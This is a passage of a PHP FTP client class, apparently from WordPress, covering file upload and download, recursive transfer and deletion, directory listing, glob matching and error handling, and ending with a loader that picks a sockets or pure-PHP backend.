if(!$this->_exec("FEAT", "features")) return FALSE;
if(!$this->_checkCode()) return FALSE;
$f=preg_split("/[".CRLF."]+/", preg_replace("/[0-9]{3}[ -].*[".CRLF."]+/", "", $this->_message), -1, PREG_SPLIT_NO_EMPTY);
$this->_features=array();
foreach($f as $k=>$v) {
$v=explode(" ", trim($v));
$this->_features[array_shift($v)]=$v;
}
return true;
}
function rawlist($pathname="", $arg="") {
return $this->_list(($arg?" ".$arg:"").($pathname?" ".$pathname:""), "LIST", "rawlist");
}
function nlist($pathname="", $arg="") {
return $this->_list(($arg?" ".$arg:"").($pathname?" ".$pathname:""), "NLST", "nlist");
}
function is_exists($pathname) {
return $this->file_exists($pathname);
}
function file_exists($pathname) {
$exists=true;
if(!$this->_exec("RNFR ".$pathname, "rename")) $exists=FALSE;
else {
if(!$this->_checkCode()) $exists=FALSE;
$this->abort();
}
if($exists) $this->SendMSG("Remote file ".$pathname." exists");
else $this->SendMSG("Remote file ".$pathname." does not exist");
return $exists;
}
function fget($fp, $remotefile, $rest=0) {
if($this->_can_restore and $rest!=0) fseek($fp, $rest);
$pi=pathinfo($remotefile);
if($this->_type==FTP_ASCII or ($this->_type==FTP_AUTOASCII and in_array(strtoupper($pi["extension"]), $this->AutoAsciiExt))) $mode=FTP_ASCII;
else $mode=FTP_BINARY;
if(!$this->_data_prepare($mode)) {
return FALSE;
}
if($this->_can_restore and $rest!=0) $this->restore($rest);
if(!$this->_exec("RETR ".$remotefile, "get")) {
$this->_data_close();
return FALSE;
}
if(!$this->_checkCode()) {
$this->_data_close();
return FALSE;
}
$out=$this->_data_read($mode, $fp);
$this->_data_close();
if(!$this->_readmsg()) return FALSE;
if(!$this->_checkCode()) return FALSE;
return $out;
}
function get($remotefile, $localfile=NULL, $rest=0) {
if(is_null($localfile)) $localfile=$remotefile;
if (@file_exists($localfile)) $this->SendMSG("Warning : local file will be overwritten");
$fp = @fopen($localfile, "w");
if (!$fp) {
$this->PushError("get","cannot open local file", "Cannot create \"".$localfile."\"");
return FALSE;
}
if($this->_can_restore and $rest!=0) fseek($fp, $rest);
$pi=pathinfo($remotefile);
if($this->_type==FTP_ASCII or ($this->_type==FTP_AUTOASCII and in_array(strtoupper($pi["extension"]), $this->AutoAsciiExt))) $mode=FTP_ASCII;
else $mode=FTP_BINARY;
if(!$this->_data_prepare($mode)) {
fclose($fp);
return FALSE;
}
if($this->_can_restore and $rest!=0) $this->restore($rest);
if(!$this->_exec("RETR ".$remotefile, "get")) {
$this->_data_close();
fclose($fp);
return FALSE;
}
if(!$this->_checkCode()) {
$this->_data_close();
fclose($fp);
return FALSE;
}
$out=$this->_data_read($mode, $fp);
fclose($fp);
$this->_data_close();
if(!$this->_readmsg()) return FALSE;
if(!$this->_checkCode()) return FALSE;
return $out;
}
function fput($remotefile, $fp, $rest=0) {
if($this->_can_restore and $rest!=0) fseek($fp, $rest);
$pi=pathinfo($remotefile);
if($this->_type==FTP_ASCII or ($this->_type==FTP_AUTOASCII and in_array(strtoupper($pi["extension"]), $this->AutoAsciiExt))) $mode=FTP_ASCII;
else $mode=FTP_BINARY;
if(!$this->_data_prepare($mode)) {
return FALSE;
}
if($this->_can_restore and $rest!=0) $this->restore($rest);
if(!$this->_exec("STOR ".$remotefile, "put")) {
$this->_data_close();
return FALSE;
}
if(!$this->_checkCode()) {
$this->_data_close();
return FALSE;
}
$ret=$this->_data_write($mode, $fp);
$this->_data_close();
if(!$this->_readmsg()) return FALSE;
if(!$this->_checkCode()) return FALSE;
return $ret;
}
function put($localfile, $remotefile=NULL, $rest=0) {
if(is_null($remotefile)) $remotefile=$localfile;
if (!file_exists($localfile)) {
$this->PushError("put","cannot open local file", "No such file or directory \"".$localfile."\"");
return FALSE;
}
$fp = @fopen($localfile, "r");
if (!$fp) {
$this->PushError("put","cannot open local file", "Cannot read file \"".$localfile."\"");
return FALSE;
}
if($this->_can_restore and $rest!=0) fseek($fp, $rest);
$pi=pathinfo($localfile);
if($this->_type==FTP_ASCII or ($this->_type==FTP_AUTOASCII and in_array(strtoupper($pi["extension"]), $this->AutoAsciiExt))) $mode=FTP_ASCII;
else $mode=FTP_BINARY;
if(!$this->_data_prepare($mode)) {
fclose($fp);
return FALSE;
}
if($this->_can_restore and $rest!=0) $this->restore($rest);
if(!$this->_exec("STOR ".$remotefile, "put")) {
$this->_data_close();
fclose($fp);
return FALSE;
}
if(!$this->_checkCode()) {
$this->_data_close();
fclose($fp);
return FALSE;
}
$ret=$this->_data_write($mode, $fp);
fclose($fp);
$this->_data_close();
if(!$this->_readmsg()) return FALSE;
if(!$this->_checkCode()) return FALSE;
return $ret;
}
function mput($local=".", $remote=NULL, $continious=false) {
$local=realpath($local);
if(!@file_exists($local)) {
$this->PushError("mput","cannot open local folder", "Cannot stat folder \"".$local."\"");
return FALSE;
}
if(!is_dir($local)) return $this->put($local, $remote);
if(empty($remote)) $remote=".";
elseif(!$this->file_exists($remote) and !$this->mkdir($remote)) return FALSE;
if($handle = opendir($local)) {
$list=array();
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") $list[]=$file;
}
closedir($handle);
} else {
$this->PushError("mput","cannot open local folder", "Cannot read folder \"".$local."\"");
return FALSE;
}
if(empty($list)) return TRUE;
$ret=true;
foreach($list as $el) {
if(is_dir($local."/".$el)) $t=$this->mput($local."/".$el, $remote."/".$el);
else $t=$this->put($local."/".$el, $remote."/".$el);
if(!$t) {
$ret=FALSE;
if(!$continious) break;
}
}
return $ret;
}
function mget($remote, $local=".", $continious=false) {
$list=$this->rawlist($remote, "-lA");
if($list===false) {
$this->PushError("mget","cannot read remote folder list", "Cannot read remote folder \"".$remote."\" contents");
return FALSE;
}
if(empty($list)) return true;
if(!@file_exists($local)) {
if(!@mkdir($local)) {
$this->PushError("mget","cannot create local folder", "Cannot create folder \"".$local."\"");
return FALSE;
}
}
foreach($list as $k=>$v) {
$list[$k]=$this->parselisting($v);
if( ! $list[$k] or $list[$k]["name"]=="." or $list[$k]["name"]=="..") unset($list[$k]);
}
$ret=true;
foreach($list as $el) {
if($el["type"]=="d") {
if(!$this->mget($remote."/".$el["name"], $local."/".$el["name"], $continious)) {
$this->PushError("mget", "cannot copy folder", "Cannot copy remote folder \"".$remote."/".$el["name"]."\" to local \"".$local."/".$el["name"]."\"");
$ret=false;
if(!$continious) break;
}
} else {
if(!$this->get($remote."/".$el["name"], $local."/".$el["name"])) {
$this->PushError("mget", "cannot copy file", "Cannot copy remote file \"".$remote."/".$el["name"]."\" to local \"".$local."/".$el["name"]."\"");
$ret=false;
if(!$continious) break;
}
}
@chmod($local."/".$el["name"], $el["perms"]);
$t=strtotime($el["date"]);
if($t!==-1 and $t!==false) @touch($local."/".$el["name"], $t);
}
return $ret;
}
function mdel($remote, $continious=false) {
$list=$this->rawlist($remote, "-la");
if($list===false) {
$this->PushError("mdel","cannot read remote folder list", "Cannot read remote folder \"".$remote."\" contents");
return false;
}
foreach($list as $k=>$v) {
$list[$k]=$this->parselisting($v);
if( ! $list[$k] or $list[$k]["name"]=="." or $list[$k]["name"]=="..") unset($list[$k]);
}
$ret=true;
foreach($list as $el) {
if ( empty($el) )
continue;
if($el["type"]=="d") {
if(!$this->mdel($remote."/".$el["name"], $continious)) {
$ret=false;
if(!$continious) break;
}
} else {
if (!$this->delete($remote."/".$el["name"])) {
$this->PushError("mdel", "cannot delete file", "Cannot delete remote file \"".$remote."/".$el["name"]."\"");
$ret=false;
if(!$continious) break;
}
}
}
if(!$this->rmdir($remote)) {
$this->PushError("mdel", "cannot delete folder", "Cannot delete remote folder \"".$remote."/".$el["name"]."\"");
$ret=false;
}
return $ret;
}
function mmkdir($dir, $mode = 0777) {
if(empty($dir)) return FALSE;
if($this->is_exists($dir) or $dir == "/" ) return TRUE;
if(!$this->mmkdir(dirname($dir), $mode)) return false;
$r=$this->mkdir($dir, $mode);
$this->chmod($dir,$mode);
return $r;
}
function glob($pattern, $handle=NULL) {
$path=$output=null;
if(PHP_OS=='WIN32') $slash='\\';
else $slash='/';
$lastpos=strrpos($pattern,$slash);
if(!($lastpos===false)) {
$path=substr($pattern,0,-$lastpos-1);
$pattern=substr($pattern,$lastpos);
} else $path=getcwd();
if(is_array($handle) and !empty($handle)) {
foreach($handle as $dir) {
if($this->glob_pattern_match($pattern,$dir))
$output[]=$dir;
}
} else {
$handle=@opendir($path);
if($handle===false) return false;
while($dir=readdir($handle)) {
if($this->glob_pattern_match($pattern,$dir))
$output[]=$dir;
}
closedir($handle);
}
if(is_array($output)) return $output;
return false;
}
function glob_pattern_match($pattern,$subject) {
$out=null;
$chunks=explode(';',$pattern);
foreach($chunks as $pattern) {
$escape=array('$','^','.','{','}','(',')','[',']','|');
while(str_contains($pattern,'**'))
$pattern=str_replace('**','*',$pattern);
foreach($escape as $probe)
$pattern=str_replace($probe,"\\$probe",$pattern);
$pattern=str_replace('?*','*',
str_replace('*?','*',
str_replace('*',".*",
str_replace('?','.{1,1}',$pattern))));
$out[]=$pattern;
}
if(count($out)==1) return($this->glob_regexp("^$out[0]$",$subject));
else {
foreach($out as $tester)
// TODO: This should probably be glob_regexp(), but needs tests.
if($this->my_regexp("^$tester$",$subject)) return true;
}
return false;
}
function glob_regexp($pattern,$subject) {
$sensitive=(PHP_OS!='WIN32');
return ($sensitive?
preg_match( '/' . preg_quote( $pattern, '/' ) . '/', $subject ) :
preg_match( '/' . preg_quote( $pattern, '/' ) . '/i', $subject )
);
}
function dirlist($remote) {
$list=$this->rawlist($remote, "-la");
if($list===false) {
$this->PushError("dirlist","cannot read remote folder list", "Cannot read remote folder \"".$remote."\" contents");
return false;
}
$dirlist = array();
foreach($list as $k=>$v) {
$entry=$this->parselisting($v);
if ( empty($entry) )
continue;
if($entry["name"]=="." or $entry["name"]=="..")
continue;
$dirlist[$entry['name']] = $entry;
}
return $dirlist;
}
// <!-- --------------------------------------------------------------------------------------- -->
// <!-- Private functions -->
// <!-- --------------------------------------------------------------------------------------- -->
function _checkCode() {
return ($this->_code<400 and $this->_code>0);
}
function _list($arg="", $cmd="LIST", $fnction="_list") {
if(!$this->_data_prepare()) return false;
if(!$this->_exec($cmd.$arg, $fnction)) {
$this->_data_close();
return FALSE;
}
if(!$this->_checkCode()) {
$this->_data_close();
return FALSE;
}
$out="";
if($this->_code<200) {
$out=$this->_data_read();
$this->_data_close();
if(!$this->_readmsg()) return FALSE;
if(!$this->_checkCode()) return FALSE;
if($out === FALSE ) return FALSE;
$out=preg_split("/[".CRLF."]+/", $out, -1, PREG_SPLIT_NO_EMPTY);
// $this->SendMSG(implode($this->_eol_code[$this->OS_local], $out));
}
return $out;
}
// <!-- --------------------------------------------------------------------------------------- -->
// <!-- Partie : gestion des erreurs -->
// <!-- --------------------------------------------------------------------------------------- -->
// Gnre une erreur pour traitement externe la classe
function PushError($fctname,$msg,$desc=false){
$error=array();
$error['time']=time();
$error['fctname']=$fctname;
$error['msg']=$msg;
$error['desc']=$desc;
if($desc) $tmp=' ('.$desc.')'; else $tmp='';
$this->SendMSG($fctname.': '.$msg.$tmp);
return(array_push($this->_error_array,$error));
}
// Rcupre une erreur externe
function PopError(){
if(count($this->_error_array)) return(array_pop($this->_error_array));
else return(false);
}
}
$mod_sockets = extension_loaded( 'sockets' );
if ( ! $mod_sockets && function_exists( 'dl' ) && is_callable( 'dl' ) ) {
$prefix = ( PHP_SHLIB_SUFFIX == 'dll' ) ? 'php_' : '';
@dl( $prefix . 'sockets.' . PHP_SHLIB_SUFFIX ); // phpcs:ignore PHPCompatibility.FunctionUse.RemovedFunctions.dlDeprecated
$mod_sockets = extension_loaded( 'sockets' );
}
require_once __DIR__ . "/class-ftp-" . ( $mod_sockets ? "sockets" : "pure" ) . ".php";
if ( $mod_sockets ) {
class ftp extends ftp_sockets {}
} else {
class ftp extends ftp_pure {}
}